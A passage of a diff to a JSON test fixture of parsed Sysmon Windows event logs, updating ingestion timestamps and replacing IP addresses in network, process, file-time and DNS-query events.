}, "network": { "protocol": "netbios-ns", - "community_id": "1:r3C/WjbATNIislTQ0M+ySzwnuiw=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" @@ -10765,13 +10647,13 @@ ], "ip": [ "10.0.2.15", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741794800Z", + "ingested": "2021-12-09T13:50:23.457192300Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:50.357Z", @@ -10824,7 +10706,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741803400Z", + "ingested": "2021-12-09T13:50:23.457198Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.354274600Z'/\u003e\u003cEventRecordID\u003e24\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.350\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccc6-5c8f-0000-001005082900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4832\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -10875,7 +10757,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741812100Z", + "ingested": "2021-12-09T13:50:23.457203800Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.364042800Z'/\u003e\u003cEventRecordID\u003e25\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.364\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cccc-5c8f-0000-0010e8272900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e3208\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -10936,7 +10818,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741820600Z", + "ingested": "2021-12-09T13:50:23.457210Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.402119100Z'/\u003e\u003cEventRecordID\u003e26\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\fe823684-c940-49f2-a940-14b02cbafba9.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.387\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -10997,7 +10879,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741829Z", + "ingested": "2021-12-09T13:50:23.457215900Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e27\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\162d4140-cfab-4d05-9c92-bca60515a622.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:04.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11058,7 +10940,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741837600Z", + "ingested": "2021-12-09T13:50:23.457221600Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e28\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\1450fedf-ac4c-4e35-b371-ed5d3bbe4776.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.028\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.402\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11119,7 +11001,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741846Z", + "ingested": "2021-12-09T13:50:23.457227300Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.417733000Z'/\u003e\u003cEventRecordID\u003e29\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\37ed32e9-3c5f-4663-8457-c70743e9456d.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:51:54.980\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11177,7 +11059,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741858100Z", + "ingested": "2021-12-09T13:50:23.457233400Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e30\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccab-5c8f-0000-001064eb2700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2680\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11238,7 +11120,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.741867400Z", + "ingested": "2021-12-09T13:50:23.457239600Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e31\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\nmmhkkegccagdldgiimedpiccmgmieda\\def\\ecb9c915-c4c2-4600-a920-f2bc302990a8.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:08.496\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -11306,12 +11188,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { @@ -11328,13 +11210,13 @@ "dsum.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741875900Z", + "ingested": "2021-12-09T13:50:23.457245400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11398,23 +11280,23 @@ "type": "CNAME" }, { - "data": "216.200.232.235", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.201", + "data": "89.160.20.156", "type": "A" }, { - "data": "74.121.138.26", + "data": "89.160.20.156", "type": "A" }, { - "data": "216.200.232.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11422,7 +11304,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11430,7 +11312,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11438,22 +11320,22 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" } ], "resolved_ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "network": { @@ -11469,23 +11351,20 @@ "sync.mathtag.com" ], "ip": [ - "216.200.232.235", - "216.200.232.201", - "74.121.138.26", - "216.200.232.185", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30" + "192.168.80.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741882800Z", + "ingested": "2021-12-09T13:50:23.457251300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData 